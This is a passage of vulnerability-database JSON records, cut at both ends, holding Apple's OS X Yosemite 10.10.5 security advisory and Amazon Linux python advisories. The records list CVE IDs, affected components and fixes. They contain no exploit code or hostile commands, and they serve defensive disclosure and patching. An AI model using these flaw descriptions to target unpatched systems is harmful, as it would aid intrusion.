pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO&#39;s handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework&#39;s &#39;runner&#39;\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework&#39;s &#39;runner&#39; binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n&#40;@jollyjinx&#41; of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit&#39;s handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple&#39;s Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-08-17T00:00:00", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:00", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:12", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "x86_64", "packageFilename": "python27-2.7.5-11.32.amzn1.x86_64.rpm", "packageName": "python27", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "i686", "packageFilename": "python27-tools-2.7.5-11.32.amzn1.i686.rpm", "packageName": "python27-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "x86_64", "packageFilename": "python27-tools-2.7.5-11.32.amzn1.x86_64.rpm", "packageName": "python27-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "x86_64", "packageFilename": "python27-debuginfo-2.7.5-11.32.amzn1.x86_64.rpm", "packageName": "python27-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "x86_64", "packageFilename": "python27-libs-2.7.5-11.32.amzn1.x86_64.rpm", "packageName": "python27-libs", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "x86_64", "packageFilename": "python27-test-2.7.5-11.32.amzn1.x86_64.rpm", "packageName": "python27-test", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "i686", "packageFilename": "python27-libs-2.7.5-11.32.amzn1.i686.rpm", "packageName": "python27-libs", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "i686", "packageFilename": "python27-2.7.5-11.32.amzn1.i686.rpm", "packageName": "python27", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "i686", "packageFilename": "python27-test-2.7.5-11.32.amzn1.i686.rpm", "packageName": "python27-test", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "x86_64", "packageFilename": "python27-devel-2.7.5-11.32.amzn1.x86_64.rpm", "packageName": "python27-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "i686", "packageFilename": "python27-devel-2.7.5-11.32.amzn1.i686.rpm", "packageName": "python27-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "i686", "packageFilename": "python27-debuginfo-2.7.5-11.32.amzn1.i686.rpm", "packageName": "python27-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.7.5-11.32.amzn1", "arch": "src", "packageFilename": "python27-2.7.5-11.32.amzn1.src.rpm", "packageName": "python27", "operator": "lt"}], "description": "**Issue Overview:**\n\nBuffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string. \n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.5-11.32.amzn1.i686 \n python27-test-2.7.5-11.32.amzn1.i686 \n python27-2.7.5-11.32.amzn1.i686 \n python27-debuginfo-2.7.5-11.32.amzn1.i686 \n python27-libs-2.7.5-11.32.amzn1.i686 \n python27-devel-2.7.5-11.32.amzn1.i686 \n \n src: \n python27-2.7.5-11.32.amzn1.src \n \n x86_64: \n python27-tools-2.7.5-11.32.amzn1.x86_64 \n python27-libs-2.7.5-11.32.amzn1.x86_64 \n python27-devel-2.7.5-11.32.amzn1.x86_64 \n python27-2.7.5-11.32.amzn1.x86_64 \n python27-debuginfo-2.7.5-11.32.amzn1.x86_64 \n python27-test-2.7.5-11.32.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-09-16T22:33:00", "title": "Medium: python27", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:12", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "modified": "2014-09-16T22:33:00", "id": "ALAS-2014-293", "href": "https://alas.aws.amazon.com/ALAS-2014-293.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:18", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "i686", "packageFilename": "python26-libs-2.6.9-1.43.amzn1.i686.rpm", "packageName": "python26-libs", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "i686", "packageFilename": "python26-devel-2.6.9-1.43.amzn1.i686.rpm", "packageName": "python26-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "i686", "packageFilename": "python26-tools-2.6.9-1.43.amzn1.i686.rpm", "packageName": "python26-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "x86_64", "packageFilename": "python26-tools-2.6.9-1.43.amzn1.x86_64.rpm", "packageName": "python26-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "x86_64", "packageFilename": "python26-libs-2.6.9-1.43.amzn1.x86_64.rpm", "packageName": "python26-libs", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "i686", "packageFilename": "python26-debuginfo-2.6.9-1.43.amzn1.i686.rpm", "packageName": "python26-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "src", "packageFilename": "python26-2.6.9-1.43.amzn1.src.rpm", "packageName": "python26", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "x86_64", "packageFilename": "python26-devel-2.6.9-1.43.amzn1.x86_64.rpm", "packageName": "python26-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "i686", "packageFilename": "python26-test-2.6.9-1.43.amzn1.i686.rpm", "packageName": "python26-test", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "x86_64", "packageFilename": "python26-debuginfo-2.6.9-1.43.amzn1.x86_64.rpm", "packageName": "python26-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "2.6.9-1.43.amzn1", "arch": "x86_64", "packageFilename": "python26-test-2.6.9-1.43.amzn1.x86_64.rpm", "packageName": "python26-test", "operator": "lt"}, {"OS": "Amazon Linux", 